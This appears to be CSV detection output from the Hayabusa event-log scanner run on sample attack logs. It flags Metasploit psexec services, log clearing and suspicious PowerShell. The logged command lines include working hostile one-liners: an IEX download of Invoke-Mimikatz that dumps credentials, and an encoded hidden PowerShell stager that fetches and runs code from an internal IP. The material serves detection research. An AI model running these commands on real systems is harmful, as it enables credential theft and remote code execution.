+09:00,IE10Win7,7045,info,Persis,Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:58.169 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:39.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:42.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | 
Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:42.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:27:44.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:28:55.689 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:28:55.705 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:28:58.267 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\wlqywrdm.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x71c | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:33:13.923 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\0xqpayvt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x920 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:41:27.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kwos13rh.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x760 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x700 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:49.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe80 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 
WwBTAFkAUwB0AEUAbQAuAE4ARQBUAC4AUwBFAHIAdgBJAEMAZQBQAG8AaQBOAFQATQBBAE4AYQBHAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8AbgBUAGkAbgB1AEUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBlAGMAVAAgAFMAWQBTAHQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBFAE4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBBAEQAZQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAcgBPAHgAeQAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBXAEUAQgBSAGUAcQB1AEUAUwB0AF0AOgA6AEQAZQBmAGEAdQBMAFQAVwBlAEIAUABSAG8AeAB5ADsAJABXAGMALgBQAFIATwB4AFkALgBDAFIARQBEAGUATgBUAEkAYQBMAHMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4AZQB0AC4AQwByAGUARABlAG4AdABJAEEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQBVAEwAVABOAGUAVAB3AG8AcgBrAEMAcgBFAEQAZQBuAFQASQBhAEwAcwA7ACQASwA9ACcAcwB5AHwAUgA0AFgAaABCAFcAbwB6AEsALgB4AC0ANgArADkAPgBJAGkAcQA3AEQAOABgAEoATABuAGwAdwBWACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBDAGgAQQBSAFsAXQBdACgAJAB3AGMALgBEAE8AdwBuAGwAbwBhAEQAUwBUAHIASQBOAEcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAOQA4AC4AMQA0ADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwBSACQAawBbACQAaQArACsAJQAkAGsALgBMAGUAbgBnAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0ASgBPAEkATgAnACcAKQA= | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 
0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: 
%SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,../hayabusa-rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:49.876 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:49.908 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX 
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:05.661 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:07.371 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:13.803 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 